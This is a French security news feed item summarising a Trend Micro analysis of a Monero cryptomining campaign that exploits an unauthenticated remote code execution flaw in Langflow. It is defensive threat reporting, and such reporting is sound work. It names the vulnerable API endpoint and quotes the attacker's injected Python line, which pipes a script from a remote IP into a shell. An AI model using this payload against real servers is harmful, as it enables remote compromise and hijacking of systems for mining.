https://cyberveille.ch/tags/procq/ Recent content in Procq on CyberVeille Hugo -- 0.146.0 fr-fr Cyberveille CC BY-NC-SA 4.0 Fri, 26 Jun 2026 00:00:00 +0000 https://cyberveille.ch/posts/2026-06-26-cve-2026-33017-des-cryptomineurs-monero-exploitent-langflow-via-rce-non-authentifiee/ Fri, 26 Jun 2026 00:00:00 +0000 https://cyberveille.ch/posts/2026-06-26-cve-2026-33017-des-cryptomineurs-monero-exploitent-langflow-via-rce-non-authentifiee/ <h2 id="-contexte">🔍 Contexte</h2> <p>Publié le 23 juin 2026 par Trend Micro (Simon Dulude et John Zhang), cet article présente une analyse technique complète d&rsquo;une campagne de cryptominage exploitant <strong>CVE-2026-33017</strong>, une vulnérabilité d&rsquo;exécution de code à distance non authentifiée dans <strong>Langflow</strong>, un framework Python de construction de workflows LLM.</p> <h2 id="-vecteur-daccès-initial">🎯 Vecteur d&rsquo;accès initial</h2> <p>L&rsquo;exploitation cible l&rsquo;endpoint <strong>POST <code>/api/v1/build_public_tmp/{flow_id}/flow</code></strong> de Langflow, qui évalue du code Python sans authentification. L&rsquo;attaquant injecte <code>__import__('os').system('curl http://83.142.209.214:8080/isp.sh | sh')</code> pour déclencher la chaîne d&rsquo;infection. Le même <code>flow_id</code> UUID (<code>0ee284cc-0eb1-493f-bc60-94fa8d1cfd18</code>) est réutilisé dans toutes les tentatives. La fenêtre d&rsquo;observation couvre 19 jours (27 mars – 15 avril 2026).</p>